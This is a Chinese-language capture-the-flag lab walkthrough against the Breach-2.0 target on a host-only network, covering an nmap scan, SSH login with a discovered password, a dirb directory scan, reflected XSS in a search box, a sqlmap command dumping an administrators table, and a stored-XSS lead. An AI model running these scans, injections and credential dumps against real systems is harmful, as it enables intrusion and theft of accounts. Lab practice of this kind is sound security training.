一、靶场环境配置
靶机:
Breach-2.0 192.168.110.151 仅主机模式
攻击机:
Kali 192.168.110.5 仅主机模式
192.168.101.11 NAT模式
二、对目标进行信息收集
1.nmap端口探测
┌──(root💀xuegod)-[~/桌面]
└─# nmap -A 192.168.110.151 -p1-65535
发现靶场的ssh服务是在65535端口
2.连接ssh服务
┌──(root💀xuegod)-[~/桌面]
└─# ssh 192.168.110.151 -p 65535
因为翻译试了好几次弱密码都不行,后面突然发现这里:密码是
inthesource
使用peter账号连接
再次使用nmap扫描,发现多了一个80端口
访问80端口也并没发现什么
3.扫描目录
┌──(root💀xuegod)-[~/桌面]
└─# dirb http://192.168.110.151 发现有个blog目录
秉着见框就插的原则,在搜索框插入xss语句,发现插入的语句会传入get传参里,没有过滤
4.sql注入找到管理员的账号密码
┌──(root💀xuegod)-[~/桌面]
└─# sqlmap -u http://192.168.110.151/blog/index.php?search=111 -D oscommerce -Tosc_administrators --dump
账号:admin密码:admin 但没有找到登录窗口
5.通过关键字,漏洞库搜索payload
blogphp
该博客系统版本存在存储型XSS,在注册页面用户名的地方输入XSS攻击语句就可以成功攻击